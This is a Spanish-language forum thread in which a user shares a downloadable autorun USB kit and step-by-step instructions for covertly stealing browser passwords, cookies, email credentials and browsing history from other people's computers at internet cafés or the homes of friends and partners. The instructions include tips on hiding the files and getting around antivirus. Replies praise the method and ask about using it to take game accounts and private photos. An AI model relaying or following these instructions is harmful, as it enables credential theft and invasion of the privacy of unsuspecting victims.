Robar contraseñas de una PC atraves de tu PENDRIVE

Tema en

Curiosidades

iniciado por elparka, 16 Jul 2011.

1. elparka

elparka Usuario

Me Gusta Recibidos:
    1
    Trofeos:
    18
    omo el titulo lo dice este progama lo que es robar todo tipo de informacion de la PC victima... lo que tenemos que hacer es cargar unos archivos a nuestro Pendrive o dispositivo USB y al meterlo en la PC victima automáticamente captura toda la info posible.... como por ejemplo:
    -toda clase de contraseñas del navegador web hi-5,myspace, e incluso de foros..

- historial de navegacion completo ( para darte cuenta del perfil de la victima y o amiga )

-cookies esto sabran mis amigos mas experimentados para lo que sirve

-los clientes de correo tales como msn , yahoo, gmail y demas

-toda la informacion de su hardware e ips

-los puertos abiertos recientemente

-licencias de los programas que tiene (incluidos windo$ ,adobe y demas)

1.- descargas el archivo lo descomprimes y cortas todos los archivos (exepto el txt esas son las instrucciones que les puse) luego abres tu usb y pegas los 5 quedandote asi:

tambien puedes meter otros archivos en la usb o ponerlos como ocultos para no levantar sospechas

nota: al momento de descargar y descomprimir te lo maracara como archivo peligroso es natural pues tiene el autorun pero no te preocupes no es peligroso para ti ...

2.- una vez preparado con tu llave de los secretos(tu usb) llegas a cualquier cyber o casa de amigo o novia o cualquier victima que le traigas ganas y bajo cualquier pretexto le insertas la usb esperas 10 segundos aprox o mas y la sacas ojo nunca abras ninguna de las 5 carpetas por que si no la cagaras te mandara un mensaje de deteccion el antivirus asi que mejor dejalo asi

3.- llegas tranquilamente a tu pc y revisas la carpeta de tu usb llamada 'dump' observaras una carpeta con el nombre de la pc victima y dentro de ella ordenaditos varios archivos html revisas los archivos y veras lo que tienes a tu disposicion

1000 % garantizado y probado aca las pruebas...

exploremos una carpeta aunque omitire las contraseñas y parte del correo por razones obvias lo que tenia la victima de contraseñas xD

Descarga

www.megaupload.com/?d=72E1X9FR
  2. Mobius

Mobius Moderador

Me Gusta Recibidos:
    25
    Trofeos:
    48
    Jajaja muy Bueno para aquellas personas que dicen q son trankilas pero en realidad son unos diablill@s
  3. Enkh

Enkh Usuario

Me Gusta Recibidos:
    65
    Trofeos:
    48
    :no: no me confio mucho descargar ese programa deve terner virus o keyloggers
  4. Carther

Carther Usuario

Me Gusta Recibidos:
    42
    Trofeos:
    48
    Pfff la isea es hackear al enemigo no hackear al amigo ! :yuno:
  5. kurusaky

kurusaky Destacado Premium MH

Me Gusta Recibidos:
    107
    Trofeos:
    93
    hummm muy bueno jujujuju aver si logro con ciber XD
    • Noob Noob x 1
  6. elparka

elparka Usuario

Me Gusta Recibidos:
    1
    Trofeos:
    18
    AVER CONTESTARE A onixzero AMIGO NADA TIENE VIRUZ SE SUPONE QUE VENGO A APORTAR PARA CONOCIMIENTOS NO PARA HACKEAR A GENTE DEL FORO NO LE VEO SENTIDO VA? QUERIA ACLARAR ESO GRACIAS POR CHECAR MIS POST
  7. UsuarioNuevo

UsuarioNuevo Usuario

Me Gusta Recibidos:
    0
    Trofeos:
    1
    bueno pero creo que este sistema no funciona en window 7....es solo para xp y vista cierto?
  8. elparka

elparka Usuario

Me Gusta Recibidos:
    1
    Trofeos:
    18
    perdon compaÑero solo lo prove en s.o xp nunca me fije en vista u 7 pero supongo que funciona igual tendria que probarlo solo que ya estoy retrandome de windows para comenzar con todo en gnu/linux
  9. maslox

maslox Usuario

Me Gusta Recibidos:
    11
    Trofeos:
    18
    Uy en mi ciber juegan unos 20 humanos los cuales tienen pj's de lvl 80 hacia arriba Ahora si voy a jugar Maple ^^ :) traigo fotitos calientes hackiaditas
  10. elparka

elparka Usuario

Me Gusta Recibidos:
    1
    Trofeos:
    18
    espero que te haya gustado pronto estare haciendo tutoriales nuevos esto con mi compaÑero de un ciber que quisas tradusca esto en un video para que lo entiendan mejor pero bueno eso es todo
  11. The Dark Falcon

The Dark Falcon Usuario

Me Gusta Recibidos:
    6
    Trofeos:
    18
    Lo Descargare y Analizare... Como Sea Un Troyano... Hago Que Te Baneen En El Foro... :yao:
  12. ImGian

ImGian Usuario

Me Gusta Recibidos:
    1
    Trofeos:
    18
    Sto suena interezante ... :pensando:
    aver si Flacon lo prueva aver qe tal
  13. Evil Warrior

Evil Warrior Usuario

Me Gusta Recibidos:
    1
    Trofeos:
    3
    muy bien veremos que tal funciona!!!! :cool:
  14. elparka

elparka Usuario

Me Gusta Recibidos:
    1
    Trofeos:
    18
    como veras compaÑero si funciona subo cosas para aportar conocimientos nos para infectar, y con respecto de que me haras banear no te defiendas con los moderadores en todo caso tu has algo. Eso es todo aclaro " si funciona ". Y los que digan que no ya saben que hacer directamente no miren el post y ya
  15. Thelugia

Thelugia Usuario

Me Gusta Recibidos:
    2
    Trofeos:
    18
    La pregunta de los reales.! Esto funciona estando la computadora bloqueada? Osea que uno no tenga la contraseña del computador.?
  16. Thelugia

Thelugia Usuario

Me Gusta Recibidos:
    2
    Trofeos:
    18
    Negro normalmente los autorun los antivirus los recononen como virus.! Se seguro tienes mas virus de los que crees y vienes a hablar de algo que se esta aportando en el foro.!
  17. iTzSkyper

iTzSkyper Usuario

Me Gusta Recibidos:
    11
    Trofeos:
    18
    Amigo Me Lo Descarge Y Esta libre De Virus Pero
    Tengo Una Pregunta..
    Mira Los Archivos Los Puedo Poner En una carpeta
    Osea Creo Una Carpeta Dentro De El USB
    llamada Juegos ... En Esa Carpeta podria Meter Los Archivos Y Aun Funcionarian Espero Tu respuesta
  18. felito

felito Usuario

Me Gusta Recibidos:
    0
    Trofeos:
    1
    olaz buenos amios se agradece una consulta eso tiene k estar desactivado los antivirus o k? para k funcione!
  19. elparka

elparka Usuario

Me Gusta Recibidos:
    1
    Trofeos:
    18
    Pues la verdad yo lohe echo en un ciber,osea si miramos arriba preguntan si tiene que estar activado elantivirus, creo que no tiene sentido todo ciber tiene antivirus conectado.

iTzSkyper Rta: Si amigo crea la carpeta te funcionara
  20. z3phir

z3phir Usuario

Me Gusta Recibidos:
    0
    Trofeos:
    1
    no maches esta rete bueno este post olle pero por favor sube el link a otro servidor valee.. gracias

Compartir esta página